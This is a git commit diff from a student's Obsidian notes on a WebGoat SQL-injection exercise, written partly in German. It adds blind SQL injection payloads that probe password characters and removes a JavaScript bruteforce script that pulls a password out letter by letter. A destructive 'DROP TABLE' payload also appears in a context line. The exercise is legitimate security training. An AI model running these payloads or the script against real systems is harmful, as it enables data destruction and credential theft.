vault backup: 2023-04-17 12:48:51

2023-04-17 12:48:51 +02:00
parent 22d178dcbb
commit 6550f1fec7
2 changed files with 5 additions and 178 deletions
--- a/.obsidian/workspace.json
+++ b/.obsidian/workspace.json
@@ -15,7 +15,7 @@
              "type": "markdown",
              "state": {
                "file": "Informationssicherheit/Ueb2/Ueb2.md",
-                "mode": "preview",
+                "mode": "source",
                "source": false
              }
            }
--- a/Informationssicherheit/Ueb2/Ueb2.md
+++ b/Informationssicherheit/Ueb2/Ueb2.md
@@ -96,6 +96,10 @@ Smith'; DROP TABLE access_log; --

 ### 2 

+- `tom' AND '1'='1` is vergeben
+- `tom' AND substring(password,1,1)='t` kann buchstaben des Passworts herrausfinden
+	- "Username taken" bedeutet, dass der Buchstabe richig ist
+
 ``` python
 import json  
 import requests  
@@ -141,180 +145,3 @@ def sql_injection_advance_5():
 sql_injection_advance_5()
 ```

-```js
-/**
-
-* Bruteforce tool to solve challenge 5 of WebGoat's SQL injection advanced series
-
-* http://127.0.0.1:8080/WebGoat/start.mvc#lesson/SqlInjectionAdvanced.lesson/4
-
-* To make it work, you will need to install needle with npm
-
-* Then connect to the webgoat platform, get the cookie and replace COOKIE constant value
-
-* You're good to go, just execute the script
-
-*/
-
-const needle = require('needle');
-
-const URL = 'http://127.0.0.1:8080/WebGoat/SqlInjectionAdvanced/challenge';
-
-const COOKIE = '8dIM5gDa55wQ7bXpwjA-IuipMTbpb5kehitqpJH-';
-
-const CHARACTERS = 'abcdefghijklmnopqrstuvwxyz'.split('');
-
-const passwordChars = [];
-
-const data = {
-
-email_reg: 'test@test.com',
-
-password_reg: 'test',
-
-confirm_password_reg: 'test'
-
-};
-
-/**
-
-* Sends a challenge for a given password length
-
-* Returns true if the length is correct, false otherwise
-
-* @param {Number} length
-
-* @returns {Promise<Boolean>}
-
-*/
-
-async function challengeOneLength (length) {
-
-data.username_reg = `tom' and length(password) = '${length}`;
-
-const { body } = await needle('put', URL, data, { headers: { cookie: COOKIE } });
-
-return body.feedback.includes('already exists');
-
-}
-
-/**
-
-* Bruteforces the password length
-
-* Returns the length if found, false otherwise
-
-* Restricts to a length of 100, just in case...
-
-* @returns {Promise<Number|Boolean>}
-
-*/
-
-async function findPasswordLength () {
-
-for (let n = 1; n <= 100; n++) {
-
-const length = await challengeOneLength(n);
-
-if (length) {
-
-return n;
-
-}
-
-}
-
-return false;
-
-}
-
-/**
-
-* Sends a challenge for a given char and a given position
-
-* Returns true if the given char is at the given position, false otherwise
-
-* @param {Number} pos
-
-* @param {String} char
-
-* @returns {Promise<Boolean>}
-
-*/
-
-async function challengeOneCharAt (pos, char) {
-
-data.username_reg = `tom' and substring(password, ${pos}, 1) = '${char}`;
-
-const { body } = await needle('put', URL, data, { headers: { cookie: COOKIE } });
-
-return body.feedback.includes('already exists');
-
-}
-
-/**
-
-* Bruteforces every character, at a given position
-
-* Returns the char if there is a match, false otherwise
-
-* @param {Number} pos
-
-* @returns {Promise<String|Boolean>}
-
-*/
-
-async function findCharacterAt (pos) {
-
-for (const char of CHARACTERS) {
-
-const found = await challengeOneCharAt(pos, char);
-
-if (found) {
-
-return char;
-
-}
-
-}
-
-return false;
-
-}
-
-/**
-
-* Bruteforces the password
-
-* Look for the length first, then characters, one at a time
-
-*/
-
-(async function findPassword () {
-
-const passLength = await findPasswordLength();
-
-if (passLength === false) {
-
-return console.log(`pass length not found, something went wrong`);
-
-}
-
-console.log(`found pass length: ${passLength}`);
-
-for (let n = 1; n <= passLength; n++) {
-
-const char = await findCharacterAt(n);
-
-console.log(`found char ${n}: ${char}`);
-
-passwordChars.push(char);
-
-}
-
-console.log(`found pass: ${passwordChars.join('')}`);
-
-process.exit();
-
-})();
-```